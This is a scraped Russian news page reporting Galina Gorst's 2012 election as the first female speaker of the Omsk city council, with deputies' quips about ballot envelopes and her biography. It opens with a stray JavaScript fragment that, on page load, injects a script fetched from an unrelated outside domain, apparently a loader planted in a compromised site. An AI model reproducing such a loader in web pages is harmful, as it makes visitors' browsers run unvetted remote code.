, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 15 августа, 2018 года
24 октября, 2012 Городские новости

Впервые спикером омского горсовета стала женщина

vpervye-spikerom-omskogo-gorsoveta-stala-zhenshhinaПосле избрания Вячеслава Двораковского мэром должность спикера несколько месяцев оставалась вакантной. Выбрать нового председателя с первой попытки две недели назад народным избранникам не удалось. Тогда в борьбу за должность вступили два представителя «Единой России» — Галина Горст и Игорь Погребняк. По регламенту горсовета претендент на этот пост должен набрать больше половины всех голосов депутатов, то есть не менее 21, чего в первый раз никому не удалось.

В среду снова были выдвинуты те же кандидатуры.

— Чтобы голосование было честным, тайным и без давления, у меня есть предложение: класть бюллетени в конверты. Я даже готов сейчас раздать их. Чтобы потом СМИ не говорили, что депутаты якобы кому-то показывают, как они проголосовали, — заявил лидер фракции КПРФ в горсовете Леонид Михайленко (об этом судачили после прошлого голосования).

— Аккуратнее с конвертами, в зале пресса, — вмешался в разговор депутат Сергей Дроздов. — Надо сказать на всякий случай, что они пустые, а то мы про конверты уже наслушались (опять же, ходили слухи, что голоса некоторых депутатов могли быть куплены).

— А может, в конверте что-то другое будет лежать? Это мечты, извиняюсь, — разрядил обстановку исполняющий обязанности председателя Василий Мамонтов.В итоге голосование прошло в обычном формате без конвертов. И со второй попытки Галине Горст все же удалось заручиться поддержкой коллег — за нее отдали свои голоса 22 народных избранника, 13 человек поддержали ее оппонента, и четверо высказались против всех.

Таким образом, Галина Горст станет первой женщиной-председателем в истории Омского горсовета.

— На посту спикера я буду действовать в интересах жителей и постараюсь сплотить депутатов для решения общих задач, — заявила героиня дня.наша справка

Галина Горст родилась 28 июня 1951 года в Челябинской области. В 1970 году окончила местный юридический техникум, в 1976 году — Свердловский юридический институт по специальности «Правоведение и учет в системе социального обеспечения». Избиралась депутатом Омского горсовета двух последних созывов. Пока еще является заместителем управляющего Омским отделением Пенсионного фонда. Но став спикером уйдет из ПФР и будет работать в Думе на постоянной основе.
Источник

Перейти к комментариям [ 0 ]

Свежие статьи из категории: Городские новости